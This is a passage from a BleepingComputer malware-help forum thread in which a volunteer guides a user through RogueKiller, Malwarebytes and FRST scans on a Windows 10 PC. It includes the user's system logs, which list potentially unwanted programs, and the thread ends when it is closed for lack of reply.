FirewallRules: [TCP Query User{98B45A98-C6B9-4AA0-A9B8-3587885C9D2B}\\usr-pc\gamehouse\resident evil 6\bh6.exe] => (Allow) \\usr-pc\gamehouse\resident evil 6\bh6.exe
FirewallRules: [UDP Query User{AA874175-A8EE-47EB-8877-4D0C0373CBCF}C:\program files (x86)\capcom\resident evil 6\bh6.exe] => (Allow) C:\program files (x86)\capcom\resident evil 6\bh6.exe
FirewallRules: [TCP Query User{D0CE51F2-5AEE-443A-8C38-861999D811D3}C:\program files (x86)\capcom\resident evil 6\bh6.exe] => (Allow) C:\program files (x86)\capcom\resident evil 6\bh6.exe
FirewallRules: [UDP Query User{C8E1220B-33B0-4F0F-91BD-FC1A744584B0}C:\program files (x86)\microsoft studios\age of empires iii - complete collection\bin\age3.exe] => (Allow) C:\program files (x86)\microsoft studios\age of empires iii - complete collection\bin\age3.exe
FirewallRules: [TCP Query User{757BFCD5-75C1-4377-8E04-F7DC3026E87A}C:\program files (x86)\microsoft studios\age of empires iii - complete collection\bin\age3.exe] => (Allow) C:\program files (x86)\microsoft studios\age of empires iii - complete collection\bin\age3.exe
FirewallRules: [{15A5088F-BF27-4B93-9F42-C11F1A1F46D1}] => (Block) C:\program files (x86)\sniper ghost warrior 2\bin32\sniperghostwarrior2.exe
FirewallRules: [{9B0EDE8F-DBAF-4AC7-BE10-54F86011478A}] => (Block) C:\program files (x86)\sniper ghost warrior 2\bin32\sniperghostwarrior2.exe
FirewallRules: [UDP Query User{490DB369-4DDC-4A1E-BFDE-C02EE7D3943A}C:\program files (x86)\sniper ghost warrior 2\bin32\sniperghostwarrior2.exe] => (Allow) C:\program files (x86)\sniper ghost warrior 2\bin32\sniperghostwarrior2.exe
FirewallRules: [TCP Query User{1B7838C9-A86E-4793-840D-AF237BE770AE}C:\program files (x86)\sniper ghost warrior 2\bin32\sniperghostwarrior2.exe] => (Allow) C:\program files (x86)\sniper ghost warrior 2\bin32\sniperghostwarrior2.exe
FirewallRules: [UDP Query User{CC2C9EF8-6723-4A2E-872D-E5AC27228094}C:\program files (x86)\rockstar games\grand theft auto v\gta5.exe] => (Allow) C:\program files (x86)\rockstar games\grand theft auto v\gta5.exe
FirewallRules: [TCP Query User{F016BBFC-6387-4A47-BCE2-7E69B68BA880}C:\program files (x86)\rockstar games\grand theft auto v\gta5.exe] => (Allow) C:\program files (x86)\rockstar games\grand theft auto v\gta5.exe
FirewallRules: [UDP Query User{3DDA99A6-D265-4C86-9432-3F6CB04416F3}C:\program files (x86)\microsoft studios\age of empires iii - complete collection\bin\age3.exe] => (Allow) C:\program files (x86)\microsoft studios\age of empires iii - complete collection\bin\age3.exe
FirewallRules: [TCP Query User{88D69A19-C8C7-41DA-A468-3EC565D2C72E}C:\program files (x86)\microsoft studios\age of empires iii - complete collection\bin\age3.exe] => (Allow) C:\program files (x86)\microsoft studios\age of empires iii - complete collection\bin\age3.exe
FirewallRules: [{694FC46A-055D-4F26-9021-7D9C220BBD2C}] => (Allow) G:\Wifi Hotspot\Baidu WiFiHotspot\WifiHotspot.exe
FirewallRules: [{3B98A2AD-E44F-442D-8A6F-06549F5871AF}] => (Allow) G:\Wifi Hotspot\Baidu WiFiHotspot\WifiHotspot.exe
FirewallRules: [UDP Query User{5C2F8DC1-21B0-410C-B97E-34999CA4B5F8}C:\program files (x86)\splinter cell conviction\src\system\conviction_game.exe] => (Allow) C:\program files (x86)\splinter cell conviction\src\system\conviction_game.exe
FirewallRules: [TCP Query User{FA98A3D9-EEC0-497A-A255-104B329DBCAB}C:\program files (x86)\splinter cell conviction\src\system\conviction_game.exe] => (Allow) C:\program files (x86)\splinter cell conviction\src\system\conviction_game.exe
FirewallRules: [UDP Query User{4884DB2B-D5F6-4D49-855D-A8951A0D7595}C:\program files (x86)\rockstar games\grand theft auto v\gta5.exe] => (Allow) C:\program files (x86)\rockstar games\grand theft auto v\gta5.exe
FirewallRules: [TCP Query User{2CE596B1-299E-482B-B921-9ECE9860CA41}C:\program files (x86)\rockstar games\grand theft auto v\gta5.exe] => (Allow) C:\program files (x86)\rockstar games\grand theft auto v\gta5.exe
FirewallRules: [TCP Query User{DDE4A971-402D-437B-B1B2-0B62C0F00980}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [UDP Query User{0BC31391-9E22-4CEE-A562-3E9C9068B26D}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [{75D70031-F757-4256-81AC-1776841F14E0}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{507D0D2D-0FC2-4644-AA3D-B81817786283}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{37AA25AD-29DA-4C78-B9DB-68F2B3009783}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe
FirewallRules: [{E6639186-662C-4F23-B81D-8AB5144C8C3A}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe
FirewallRules: [{BD3BB9CB-6640-4DCF-825F-31CC3F6BCF89}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe
FirewallRules: [{8DE5E038-0234-4BF3-A13D-E054603F5155}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe
 
==================== Restore Points =========================
 
ATTENTION: System Restore is disabled
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (09/01/2017 07:52:57 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (09/01/2017 07:52:40 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007267C
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (09/01/2017 06:57:20 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=UserLogon;SessionId=2
 
Error: (09/01/2017 06:49:30 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007139F
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (09/01/2017 06:49:28 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007139F
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (09/01/2017 06:45:48 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=UserLogon;SessionId=1
 
Error: (09/01/2017 06:45:45 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (09/01/2017 06:32:57 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program dllhost.exe version 10.0.15063.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
 
Process ID: 1cbc
 
Start Time: 01d323156dab4199
 
Termination Time: 20
 
Application Path: C:\Windows\System32\dllhost.exe
 
Report Id: 76563e65-872d-49b9-bf6a-9043a3e1bf7b
 
Faulting package full name: 
 
Faulting package-relative application ID:
 
Error: (09/01/2017 06:22:12 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=UserLogon;SessionId=6
 
Error: (09/01/2017 06:18:50 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007139F
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable
 
 
System errors:
=============
Error: (09/01/2017 06:47:38 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Sync Host_70a98 service terminated with the following error: 
Access is denied.
 
Error: (09/01/2017 06:47:06 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Dell Foundation Services service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (09/01/2017 06:47:06 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Dell Foundation Services service to connect.
 
Error: (09/01/2017 06:44:34 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The WsAppService service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (09/01/2017 06:44:34 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Ds3Service service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (09/01/2017 06:44:34 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Ds3Service service to connect.
 
Error: (09/01/2017 06:44:34 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the WsAppService service to connect.
 
Error: (09/01/2017 06:44:34 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The TrueKey service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (09/01/2017 06:44:34 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the TrueKey service to connect.
 
Error: (09/01/2017 06:44:33 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The TrueKeyScheduler service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
 
CodeIntegrity:
===================================
  Date: 2017-09-01 10:49:28.379
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\DriverStore\FileRepository\nvdmi.inf_amd64_1a197825c61edb6c\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-09-01 10:49:28.014
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-09-01 00:45:07.142
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows.old\WINDOWS\WinSxS\amd64_microsoft-windows-t..lications-clientsku_31bf3856ad364e35_10.0.14393.447_none_58b521d1e40c309d\rdpinit.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-09-01 00:45:07.126
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows.old\WINDOWS\WinSxS\amd64_microsoft-windows-t..lications-clientsku_31bf3856ad364e35_10.0.14393.447_none_58b521d1e40c309d\rdpinit.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-09-01 00:45:07.115
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows.old\WINDOWS\WinSxS\amd64_microsoft-windows-t..lications-clientsku_31bf3856ad364e35_10.0.14393.447_none_58b521d1e40c309d\rdpinit.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-09-01 00:31:51.181
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows.old\WINDOWS\SysWOW64\GamePanel.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-09-01 00:31:51.158
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows.old\WINDOWS\SysWOW64\GamePanel.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-09-01 00:31:51.132
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows.old\WINDOWS\SysWOW64\GamePanel.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-09-01 00:26:17.163
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows.old\WINDOWS\System32\MusNotificationUx.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-09-01 00:26:17.156
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows.old\WINDOWS\System32\MusNotificationUx.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i7-5500U CPU @ 2.40GHz
Percentage of memory in use: 51%
Total physical RAM: 8103.23 MB
Available physical RAM: 3956.14 MB
Total Virtual: 13103.23 MB
Available Virtual: 8427.72 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:442.34 GB) (Free:52.65 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive e: (Aezia) (Fixed) (Total:488.18 GB) (Free:74.3 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: F07651AE)
Partition 1: (Not Active) - (Size=488.2 GB) - (Type=07 NTFS)
Partition 2: (Active) - (Size=442.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=913 MB) - (Type=27)
 
==================== End of Addition.txt ============================

 




 


#2 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,683 posts
  • Gender:Male

Posted 01 September 2017 - 08:19 AM

Hi AznanZ :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broken the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lengthy, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens
  • As long as I'm assisting you on BleepingComputer, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against BleepingComputer's rules
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate it if you let me know about it first, and if you need, I can also assist you in the process
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone
    This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread
This being said, it's time to clean-up some malware, so let's get started, shall we? :)

RogueKiller
  • Download the right version of RogueKiller for your Windows version (32 or 64-bit)
  • Once done, move the executable file to your Desktop, right-click on it and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Click on the Start Scan button in the right panel, which will bring you to another tab, and click on it again (this time it'll be in the bottom right corner)
  • Wait for the scan to complete
  • On completion, the results will be displayed
  • Check every single entry (threat found), and click on the Remove Selected button
  • On completion, the results will be displayed. Click on the Open Report button in the bottom left corner, followed by the Open TXT button (also in the bottom left corner)
  • This will open the report in Notepad. Copy/paste its content in your next reply
Malwarebytes - Clean Mode
  • Download and install the free version of Malwarebytes
    Note: If you have Malwarebytes already installed, you don't need to install it again. Simply start from the next bullet point
  • Once Malwarebytes is installed, launch it and let it update its database. You might have to click on the little arrow by Scan Status in the middle right pane for it to do so
  • Once the database update is complete, click on the Scan tab, then select the Threat Scan button and click on Start Scan
  • Let the scan run, the time required to complete the scan depends on your system and computer specs
  • Once the scan is complete, make sure that the first checkbox at the top is checked (which will automatically check every detected item), then click on the Quarantine Selected button
    • If it asks you to restart your computer to complete the removal, do so
  • Click on Export Summary after the deletion (in the bottom-left corner) and select Copy to Clipboard. Paste the content in your next reply
Your next reply(ies) should include:
  • Copy/pasted RogueKiller log;
  • Copy/pasted Malwarebytes log;

Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 AznanZ

AznanZ
  • Topic Starter

  • Members
  • 5 posts

Posted 01 September 2017 - 10:41 PM

Sure, please wait Aura

#4 AznanZ

AznanZ
  • Topic Starter

  • Members
  • 5 posts

Posted 02 September 2017 - 12:20 AM

RogueKiller V12.11.12.0 (x64) [Aug 28 2017] (Free) by Adlice Software
 
Operating System : Windows 10 (10.0.15063) 64 bits version
Started in : Normal mode
User : Aezia [Administrator]
Started from : C:\Users\Aezia Aznan\Downloads\Programs\RogueKiller_portable64.exe
Mode : Scan -- Date : 09/02/2017 11:04:43 (Duration : 01:14:10)
 
¤¤¤ Processes : 0 ¤¤¤
 
¤¤¤ Registry : 12 ¤¤¤
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-3909864297-3729878400-1751894149-1001\Software\DriverToolkit -> Found
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-3909864297-3729878400-1751894149-1001\Software\eSupport.com -> Found
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-3909864297-3729878400-1751894149-1001\Software\SecuredDownload -> Found
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-3909864297-3729878400-1751894149-1001\Software\DriverToolkit -> Found
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-3909864297-3729878400-1751894149-1001\Software\eSupport.com -> Found
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-3909864297-3729878400-1751894149-1001\Software\SecuredDownload -> Found
[PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\DriverAgent-Plus_is1 -> Found
[PUP.HackTool] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\NetCut_is1 -> Found
[PUP] (X64) HKEY_USERS\S-1-5-21-3909864297-3729878400-1751894149-1001\Software\Microsoft\Windows\CurrentVersion\Run | DriverAgent Plus : C:\ProgramData\DriverAgentPlus\DriverAgentPlus.exe -pcstatus [7] -> Found
[PUP] (X86) HKEY_USERS\S-1-5-21-3909864297-3729878400-1751894149-1001\Software\Microsoft\Windows\CurrentVersion\Run | DriverAgent Plus : C:\ProgramData\DriverAgentPlus\DriverAgentPlus.exe -pcstatus [7] -> Found
[PUP.HackTool] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\AIPS (C:\Program Files (x86)\netcut\services\AIPS.exe) -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{5edcc3f5-7431-424e-be6c-4c4416c03462} | DhcpNameServer : 10.254.0.1 ([])  -> Found
 
¤¤¤ Tasks : 1 ¤¤¤
[Suspicious.Path] \UninstMiniWifi -- C:\Users\AEZIAA~1\AppData\Local\Temp\MUBDC0.bat -> Found
 
¤¤¤ Files : 14 ¤¤¤
[PUP.Gen1][Folder] C:\ProgramData\DriverAgentPlus -> Found
[PUP.Gen1][Folder] C:\ProgramData\PC Faster -> Found
[PUP.HackTool][File] C:\Users\Aezia Aznan\Desktop\netcut.lnk [LNK@] C:\PROGRA~2\netcut\netcut.exe -> Found
[PUP.HackTool][File] C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Arcai.com's NetCut.lnk [LNK@] C:\PROGRA~2\netcut\netcut.exe -> Found
[PUP.Gen1][File] C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\DriverAgent Plus.lnk [LNK@] C:\PROGRA~3\DRIVER~1\DRIVER~1.EXE -> Found
[PUP.Gen1][Folder] C:\Users\Aezia Aznan\AppData\Local\DriverToolkit -> Found
[PUP.Gen1][Folder] C:\ProgramData\DriverAgentPlus -> Found
[PUP.HackTool][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\arcai.com\netcut.lnk [LNK@] C:\PROGRA~2\netcut\netcut.exe -> Found
[PUP.HackTool][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\arcai.com\Uninstall NetCut.lnk [LNK@] C:\PROGRA~2\netcut\unins000.exe -> Found
[PUP.Gen1][Folder] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\eSupport.com -> Found
[PUP.Gen1][Folder] C:\ProgramData\PC Faster -> Found
[PUP.Gen1][Folder] C:\Program Files (x86)\DriverToolkit -> Found
[PUP.HackTool][Folder] C:\Program Files (x86)\netcut -> Found
[PUP.HackTool][File] C:\Users\Aezia Aznan\Desktop\netcut.lnk [LNK@] C:\PROGRA~2\netcut\netcut.exe -> Found
 
¤¤¤ WMI : 0 ¤¤¤
 
¤¤¤ Hosts File : 0 ¤¤¤
 
¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤
 
¤¤¤ Web browsers : 0 ¤¤¤
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD10JPVX-75JC3T0 +++++
--- User ---
[MBR] 3c43b36d62e99fb218bc99997b5cf6eb
[BSP] a9dd24c197c140539584da590d68cb17 : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 499900 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 1024002048 | Size: 452952 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
2 - [XXXXXX] ACER (0x27) [VISIBLE] Offset (sectors): 1951649792 | Size: 913 MB
User = LL1 ... OK
User = LL2 ... OK


#5 AznanZ

AznanZ
  • Topic Starter

  • Members
  • 5 posts

Posted 02 September 2017 - 01:22 AM

Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 09/02/2017
Scan Time: 12:59 PM
Logfile: 
Administrator: Yes
 
Version: 2.2.1.1043
Malware Database: v2017.09.02.03
Rootkit Database: v2017.08.02.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
 
OS: Windows 10
CPU: x64
File System: NTFS
User: Aezia
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 298869
Time Elapsed: 18 min, 42 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 0
(No malicious items detected)
 
Registry Values: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 0
(No malicious items detected)
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)


#6 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,683 posts
  • Gender:Male

Posted 02 September 2017 - 09:40 AM

The RogueKiller log you provided me is a scan one, did you remove all the threats it detected afterwards?



#7 AznanZ

AznanZ
  • Topic Starter

  • Members
  • 5 posts

Posted 02 September 2017 - 10:04 PM

yes

but looks like the behavior powemet is still alive



#8 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,683 posts
  • Gender:Male

Posted 02 September 2017 - 11:42 PM

Looks like it. In that case, let's remove it via FRST. Let's get a fresh set of logs first.

Farbar Recovery Scan Tool (FRST) - Scan mode
Follow the instructions below to download and execute a scan on your system with FRST, and provide the logs in your next reply.
  • Right-click on the executable and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Accept the disclaimer by clicking on Yes, and FRST will then do a back-up of your Registry which should take a few seconds
  • Click on the Scan button
  • On completion, two message boxes will open, saying that the results were saved to FRST.txt and Addition.txt, then open two Notepad files
  • Copy and paste the content of both FRST.txt and Addition.txt in your next reply



#9 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,683 posts
  • Gender:Male

Posted 06 September 2017 - 07:19 AM

Hi AznanZ,

Are you still with me?



#10 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,683 posts
  • Gender:Male

Posted 08 September 2017 - 08:11 AM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.





